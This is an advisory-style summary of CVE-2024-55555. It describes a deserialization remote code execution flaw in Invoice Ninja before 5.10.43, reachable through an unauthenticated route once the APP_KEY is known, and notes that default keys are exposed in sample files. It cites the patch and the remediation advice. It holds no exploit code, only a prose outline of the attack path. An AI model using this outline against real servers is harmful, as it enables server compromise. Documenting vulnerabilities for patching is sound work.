CVE-2024-55555

CVE-2024-55555 is a remote code execution vulnerability (CWE-502: Deserialization of Untrusted Data) affecting Invoice Ninja versions prior to 5.10.43. The issue stems from an unauthenticated route at /route/{hash} defined in invoiceninja/routes/client.php, where the {hash} parameter is passed to a decrypt function expecting a Laravel-encrypted serialized object. With knowledge of the application's APP_KEY, an attacker can craft a malicious payload that decrypts into a controlled string passed to an unserialize function, exploitable via known Laravel gadget chains for arbitrary deserialization leading to code execution. The vulnerability is worsened by default APP_KEY values exposed in .env example files within the product's GitHub repository. It carries a CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

A remote attacker who obtains the target instance's APP_KEY can exploit this without authentication by sending a crafted {hash} value to the vulnerable route. This decrypts into a malicious serialized PHP object, triggering remote command execution on the server through Laravel's deserialization gadget chains. The low attack complexity and network accessibility make it highly practical, especially since many deployments may retain the default APP_KEY from the repository's sample files.

The Invoice Ninja GitHub commit d9302021472c3e7e23bac8c3d5fbec57a5f38f0c patches the issue in version 5.10.43 by addressing the insecure handling in the route. The Synacktiv advisory details the unauthenticated RCE when the APP_KEY is known and recommends updating to the fixed version while regenerating the APP_KEY to non-default values to prevent exploitation.